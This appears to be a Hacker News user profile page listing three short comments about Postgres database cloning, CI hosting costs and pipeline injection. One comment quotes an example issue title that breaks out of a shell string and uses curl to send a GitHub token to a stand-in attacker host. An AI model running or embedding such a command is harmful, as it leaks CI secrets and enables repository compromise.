Viewing profile — eugercek
eugercek
HN member- Joined
- Thu, Aug 10, 2023, 2:02 PM UTC
- HN karma
- 23
- Public activity
- 3 items
- HN profile
- View on Hacker News ↗
About eugercek
No profile information was provided.
Recent public activity
-
comment
Comment #48125419
If you use xfs (+`file_copy_method=CLONE`) you can do this with Postgres 18. `CREATE DATABASE clankerdb TEMPLATE sourcedb STRATEGY=FILE_COPY;`. But Ardent can be useful for many, b…
-
comment
Comment #46294130
Companies like Ubicloud gives hosted actions faster and far more cheaper (5-10x) than Microsoft itself. Now Microsoft will charge "data plane usage" (CRUDing a row that contains (i…
-
comment
Comment #38092288
`new issue title" && curl hacker.boi -d $GITHUB_TOKEN && sleep 30` I hate pipelines even more :(